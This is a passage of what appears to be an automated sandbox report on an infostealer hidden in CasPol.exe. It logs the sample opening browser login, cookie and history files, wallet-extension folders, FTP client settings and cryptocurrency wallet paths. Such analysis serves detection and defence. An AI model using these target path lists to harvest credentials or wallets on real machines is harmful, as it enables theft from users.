Edge","n":"msedge.exe","l":"msedge.dll"},{"t":1,"p":"%localappdata%\\BraveSoftware\\Brave-Browser\\User Data","z":"Brave","f":"BraveSoftware Brave-Browser","n":"brave.exe","l":"chrome.dll"},{"t":1,"p":"%local
Source: CasPol.exe, 00000007.00000002.2450746382.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
